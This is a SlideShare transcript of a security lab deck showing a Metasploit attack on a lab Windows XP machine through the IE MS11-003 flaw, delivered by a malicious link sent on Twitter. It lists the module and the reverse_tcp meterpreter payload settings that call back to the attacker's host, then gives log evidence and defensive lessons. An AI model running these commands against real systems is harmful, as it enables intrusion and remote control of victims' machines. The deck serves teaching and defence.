Metasploit Exploitation Scenarios -EN : Scenario 1

2,356 views

Published on

First part of the Metasploit Exploitation Scenarios serie

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,356
On SlideShare
0
From Embeds
0
Number of Embeds
291
Actions
Shares
0
Downloads
100
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • Metasploit Exploitation Scenarios -EN : Scenario 1

    1. 1. Metasploit Scenarios Scenario 1Http:://eromang.zataz.com - Http://twitter.com/eromang
    2. 2. Scenario 1 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User has an admin profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - No anti-virus / Local Windows Firewall activated - Vulnerable to MS11-03 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
    3. 3. Scenario 1 : Firewall rules• Firewall administration by SSH only from internal network• Internal network is allowed to request «Any» protocols to external network
    4. 4. Scenario 1 : Story-Board✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB.✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-03 vulnerability.✤ The target click on the provided link and MS11-03 is exploited.✤ After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched.✤ No further post-exploitations
    5. 5. Scenario 1 : Metasploit commandsuse exploit/windows/browser/ms11_003_ie_css_importset SRVHOST 192.168.178.21set SRVPORT 80set URIPATH /readme.htmlset PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.178.21exploitsysinfoipconfigroutegetuid
    6. 6. Scenario 1 : EvidencesInternet Explorer process is created :A new process has been created:New Process ID: 3200Image File Name: C:Program FilesInternet Exploreriexplore.exeCreator Process ID: 2224User Name: romangDomain: ERIC-FD2123B3C5Logon ID: (0x0,0x62764)Internet Explorer process create a new «notepad.exe» process :A new process has been created:New Process ID: 3972Image File Name: C:WINDOWSsystem32notepad.exeCreator Process ID: 3200User Name: romangDomain: ERIC-FD2123B3C5Logon ID: (0x0,0x62764)Logs on the Firewall GatewayFeb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
    7. 7. Scenario 1 : Leasons Learned•Update your OS and applications !•Don’t run applications with administrator privileges !•Never click on unknown links, specialy shortened URL’s, from unknown sources !•Install an antivirus and don’t trust him :)•Don’t trust your Firewalls (Local or remote) !•Don’t allow «Any» outbound protocols connexions from your internal network tountrusted networks ! Limit your outbound connexions to your real needs. 7

    ×